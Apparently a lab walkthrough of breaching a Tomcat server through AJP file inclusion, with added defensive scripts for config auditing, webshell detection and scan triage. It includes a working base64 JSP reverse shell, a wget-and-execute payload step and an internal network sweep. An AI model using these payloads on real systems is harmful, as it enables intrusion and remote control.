External foothold
Information gathering
Run a quick Fscan scan against the target first.
Clicking around the site shows only static front-end pages with nothing of interest. Directory enumeration with dirsearch reveals that, although the server has a vulnerability allowing file execution and arbitrary file read, there is no visible upload point, so we cannot upload anything yet. The dirsearch scan:
python3 dirsearch.py -u "http://39.99.243.184:8080/"
Scan results:
[07:40:20] Starting:
[07:40:22] 302 - 0B - /js -> /js/
[07:40:34] 200 - 114B - /404.html
[07:40:40] 400 - 795B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[07:40:41] 400 - 795B - /a%5c.aspx
[07:41:14] 302 - 0B - /css -> /css/
[07:41:15] 302 - 0B - /data -> /data/
[07:41:17] 302 - 0B - /docs -> /docs/
[07:41:17] 200 - 17KB - /docs/
[07:41:17] 302 - 0B - /download -> /download/
[07:41:18] 200 - 132B - /download/
[07:41:20] 302 - 0B - /examples -> /examples/
[07:41:20] 200 - 6KB - /examples/servlets/index.html
[07:41:20] 200 - 1KB - /examples/
[07:41:20] 200 - 658B - /examples/servlets/servlet/CookieExample
[07:41:20] 200 - 947B - /examples/servlets/servlet/RequestHeaderExample
[07:41:20] 200 - 682B - /examples/jsp/snp/snoop.jsp
[07:41:26] 403 - 3KB - /host-manager/
[07:41:26] 403 - 3KB - /host-manager/html
[07:41:27] 302 - 0B - /images -> /images/
[07:41:29] 200 - 7KB - /index.html
[07:41:33] 302 - 0B - /lib -> /lib/
[07:41:37] 302 - 0B - /manager -> /manager/
[07:41:37] 403 - 3KB - /manager/admin.asp
[07:41:37] 403 - 3KB - /manager/
[07:41:37] 403 - 3KB - /manager/login
[07:41:37] 403 - 3KB - /manager/status/all
[07:41:37] 403 - 3KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage
[07:41:37] 403 - 3KB - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY
[07:41:37] 403 - 3KB - /manager/jmxproxy
[07:41:37] 403 - 3KB - /manager/jmxproxy/?qry=STUFF
[07:41:37] 403 - 3KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage&key=used
[07:41:37] 403 - 3KB - /manager/html/
[07:41:37] 403 - 3KB - /manager/VERSION
[07:41:37] 403 - 3KB - /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE
[07:41:37] 403 - 3KB - /manager/html
[07:41:38] 403 - 3KB - /manager/login.asp
[07:41:38] 403 - 3KB - /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
[07:41:38] 403 - 3KB - /manager/jmxproxy/?set=Catalina%3Atype%3DValve%2Cname%3DErrorReportValve%2Chost%3Dlocalhost&att=debug&val=cow
[07:41:38] 403 - 3KB - /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS
[07:42:11] 403 - 0B - /upload/
[07:42:11] 403 - 0B - /upload
[07:42:12] 403 - 0B - /upload/b_user.csv
[07:42:12] 403 - 0B - /upload/loginIxje.php
[07:42:12] 403 - 0B - /upload/test.txt
[07:42:12] 403 - 0B - /upload/1.php
[07:42:12] 403 - 0B - /upload/test.php
[07:42:12] 403 - 0B - /upload/b_user.xls
[07:42:12] 403 - 0B - /upload/upload.php
[07:42:12] 403 - 0B - /upload/2.php
[07:42:12] 200 - 9KB - /user.html
Visiting /docs shows the server is Tomcat 9.0.30. Searching for known issues in that version turns up CNVD-2020-10487, which allows arbitrary file read and file inclusion through the AJP connector on port 8009.
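From the defender's side, the weakness above is fixed by configuration rather than code: the AJP connector in Tomcat's server.xml is either removed or bound to loopback with a shared secret. The following audit script is an added example, not code from the original write-up or from the Tomcat project; it parses a server.xml and reports any AJP connector that is still reachable from other hosts or has no secret. Both sample configurations are constructed for the demo, and the secret value is a placeholder.

```python
"""Audit a Tomcat server.xml for an exposed AJP connector.

Added example; not code from the original write-up. The check encodes the
usual mitigation for the AJP file-read/file-inclusion weakness: remove the
AJP/1.3 connector entirely, or bind it to loopback and require a shared
secret. Both sample configurations below are constructed.
"""
import xml.etree.ElementTree as ET

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# Constructed: the shape of a stock, unhardened server.xml, where the AJP
# connector listens on every interface with no shared secret.
WEAK_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
    <Engine name="Catalina" defaultHost="localhost" />
  </Service>
</Server>"""

# Constructed: the same file after hardening (loopback bind + placeholder secret).
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE-WITH-RANDOM-SECRET"
               redirectPort="8443" />
    <Engine name="Catalina" defaultHost="localhost" />
  </Service>
</Server>"""


def audit_ajp(server_xml: str) -> list:
    """Return a list of findings; an empty list means no exposed AJP connector."""
    findings = []
    root = ET.fromstring(server_xml)
    for conn in root.iter("Connector"):
        protocol = conn.get("protocol", "HTTP/1.1")
        if not protocol.upper().startswith("AJP"):
            continue
        port = conn.get("port", "?")
        # Older Tomcat builds bound AJP to all interfaces when no address was
        # given, so a missing address is treated as exposed.
        address = conn.get("address", "0.0.0.0")
        if address not in LOOPBACK:
            findings.append(
                f"AJP connector on port {port} listens on {address}; "
                "bind it to 127.0.0.1 or remove it if nothing proxies via AJP"
            )
        # A missing or disabled secret is reported regardless of version;
        # releases without secret support can only be fixed by binding to
        # loopback or removing the connector.
        secret_required = conn.get("secretRequired", "false").lower() == "true"
        if not secret_required or not conn.get("secret"):
            findings.append(
                f"AJP connector on port {port} has no shared secret configured"
            )
    return findings


if __name__ == "__main__":
    for label, xml_text in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(label, audit_ajp(xml_text) or ["no findings"])
```

Run it against a real server.xml by passing the file contents to audit_ajp(); two findings for the stock layout, none once the connector is loopback-bound with a secret or removed.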
File inclusion only yields a shell if there is a malicious file on the server to include, so we still need an upload endpoint. Conveniently, web.xml lists a servlet named UploadTestServlet; visiting it confirms it is a file upload endpoint. Upload a reverse-shell JSP with the following content:
<% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}").getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); out.print("</pre>"); } %>
Reverse shell
First start a listener: nc -lvnp 7777
Then use the script to include the uploaded file through AJP:
python3 tomcat.py http://39.99.243.184:8080/ 8009 xx.txt eval
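For detection, the uploaded JSP has two traits that are easy to flag in an upload directory or webroot scan: a Runtime.exec / ProcessBuilder call, and a base64 literal that decodes to a reverse-shell command line. The scanner below is an added example, not code from the original write-up; it decodes every base64-looking token and checks the plaintext for /dev/tcp, bash -i and similar markers, so it also catches variants that only change the encoded command. Both sample files are constructed (the malicious one mirrors the JSP shown above).

```python
"""Flag JSP files that carry command-execution webshell indicators.

Added example; not code from the original write-up. It checks for a
Runtime.exec / ProcessBuilder call and for base64 literals that decode to
a reverse-shell command line. Both sample files are constructed.
"""
import base64
import binascii
import re

EXEC_CALL = re.compile(
    r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\(|new\s+ProcessBuilder\s*\("
)
# Any run of base64 alphabet long enough to hide a command; short tokens such
# as ordinary identifiers are skipped to keep the false-positive rate down.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
SHELL_MARKERS = ("/dev/tcp/", "bash -i", "nc -e", "/bin/sh")

# Constructed sample mirroring the shell uploaded in the write-up.
SAMPLE_WEBSHELL = """<% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}").getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); out.print("</pre>"); } %>"""

# Constructed benign page for comparison.
SAMPLE_BENIGN = """<%@ page contentType="text/html" %>
<html><body>Server time: <%= new java.util.Date() %></body></html>"""


def decoded_literals(text: str):
    """Yield the plaintext of every base64-looking token that decodes cleanly."""
    for match in B64_TOKEN.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        yield raw.decode("utf-8", errors="ignore")


def scan_jsp(text: str) -> list:
    """Return the indicator names found in a JSP source; empty means clean."""
    indicators = []
    if EXEC_CALL.search(text):
        indicators.append("command_execution")
    if any(marker in plain
           for plain in decoded_literals(text)
           for marker in SHELL_MARKERS):
        indicators.append("base64_reverse_shell")
    return indicators


if __name__ == "__main__":
    print("webshell:", scan_jsp(SAMPLE_WEBSHELL))
    print("benign:  ", scan_jsp(SAMPLE_BENIGN))
```

Point scan_jsp() at the contents of each file under the upload directory on a schedule; a hit on either indicator is worth a look, and a hit on both is almost never legitimate application code.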
Internal lateral movement
Information gathering
Generate a payload with VIPER and upload it to the target. On the attacker machine:
python3 -m http.server
On the target:
wget VPS:PORT/xxx.elf
./xxx.elf
Then upload fscan and chisel, and use fscan to sweep the /24: meterpreter > shell -c './fscan -h 172.22.11.76/24'
fscan version: 1.8.3
start infoscan
(icmp) Target 172.22.11.76 is alive
(icmp) Target 172.22.11.6 is alive
(icmp) Target 172.22.11.26 is alive
(icmp) Target 172.22.11.45 is alive
[*] Icmp alive hosts len is: 4
172.22.11.76:8080 open
172.22.11.76:22 open
172.22.11.26:445 open
172.22.11.45:445 open
172.22.11.6:445 open
172.22.11.45:139 open
172.22.11.26:139 open
172.22.11.6:139 open
172.22.11.26:135 open
172.22.11.45:135 open
172.22.11.6:135 open
172.22.11.76:8009 open
172.22.11.6:88 open
[*] alive ports len is: 13
start vulscan
[*] NetBios 172.22.11.6 [+] DC:XIAORANG\XIAORANG-DC
[*] NetBios 172.22.11.26 XIAORANG\XR-LCM3AE8B
[*] NetInfo
[*]172.22.11.6
[->]XIAORANG-DC
[->]172.22.11.6
[+] MS17-010 172.22.11.45(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetInfo
[*]172.22.11.26
[->]XR-LCM3AE8B
[->]172.22.11.26
[*] NetBios 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.11.76:8080 code:200 len:7091 title:后台管理
已完成 13/13
[*] 扫描结束,耗时: 7.176621862s
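The scan above is the point at which a blue team would want an inventory rather than a log: which host is the domain controller, which hosts expose SMB, and which one fscan flagged as missing a patch. The script below is an added example, not part of the original write-up or of fscan itself; it parses the line formats visible in the output above (ICMP alive, open port, NetBios name, and "[+] <check> <ip>(<os>)" hits) and ranks hosts for patching and isolation. SAMPLE_OUTPUT is copied from the scan above for the demo.

```python
"""Turn fscan output into a per-host inventory for patch and isolation triage.

Added example; not part of the original write-up or of fscan. It parses the
line formats visible in the scan output and ranks hosts a defender should
look at first. SAMPLE_OUTPUT is copied from the scan in the write-up.
"""
import re
from collections import defaultdict

ALIVE = re.compile(r"^\(icmp\) Target (\S+) is alive$")
PORT = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d+) open$")
NETBIOS = re.compile(r"^\[\*\] NetBios (\S+) (.+)$")
VULN = re.compile(r"^\[\+\] (\S+) (\d{1,3}(?:\.\d{1,3}){3})\((.*)\)$")

SAMPLE_OUTPUT = r"""(icmp) Target 172.22.11.76 is alive
(icmp) Target 172.22.11.6 is alive
(icmp) Target 172.22.11.26 is alive
(icmp) Target 172.22.11.45 is alive
172.22.11.76:8080 open
172.22.11.76:22 open
172.22.11.26:445 open
172.22.11.45:445 open
172.22.11.6:445 open
172.22.11.76:8009 open
172.22.11.6:88 open
[*] NetBios 172.22.11.6 [+] DC:XIAORANG\XIAORANG-DC
[*] NetBios 172.22.11.26 XIAORANG\XR-LCM3AE8B
[+] MS17-010 172.22.11.45(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
"""


def new_host() -> dict:
    return {"alive": False, "ports": [], "names": [], "os": None, "vulns": []}


def parse_fscan(output: str) -> dict:
    """Map each IP seen in the output to its alive flag, ports, names, OS and hits."""
    hosts = defaultdict(new_host)
    for raw in output.splitlines():
        line = raw.strip()
        if m := ALIVE.match(line):
            hosts[m[1]]["alive"] = True
        elif m := PORT.match(line):
            hosts[m[1]]["ports"].append(int(m[2]))
        elif m := NETBIOS.match(line):
            hosts[m[1]]["names"].append(m[2])
        elif m := VULN.match(line):
            hosts[m[2]]["vulns"].append(m[1])
            hosts[m[2]]["os"] = m[3]
    return dict(hosts)


def triage(hosts: dict) -> list:
    """Return (ip, reasons) pairs, most urgent first; hosts with nothing to note are left out."""
    ranked = []
    for ip, info in hosts.items():
        reasons, score = [], 0
        for check in info["vulns"]:          # unpatched finding: patch or isolate now
            reasons.append(f"vuln:{check}")
            score += 10
        if any("DC:" in name for name in info["names"]):
            reasons.append("domain-controller")
            score += 5
        if 445 in info["ports"]:
            reasons.append("smb-exposed")
            score += 1
        if 8009 in info["ports"]:            # AJP reachable from the LAN
            reasons.append("ajp-exposed")
            score += 1
        if reasons:
            ranked.append((score, ip, reasons))
    ranked.sort(key=lambda item: (-item[0], item[1]))
    return [(ip, reasons) for _, ip, reasons in ranked]


if __name__ == "__main__":
    for ip, reasons in triage(parse_fscan(SAMPLE_OUTPUT)):
        print(ip, ", ".join(reasons))
```

The weights are deliberately simple: any vulnerability hit outranks everything else, the domain controller comes next, and plain exposure of SMB or AJP is a reminder to review segmentation.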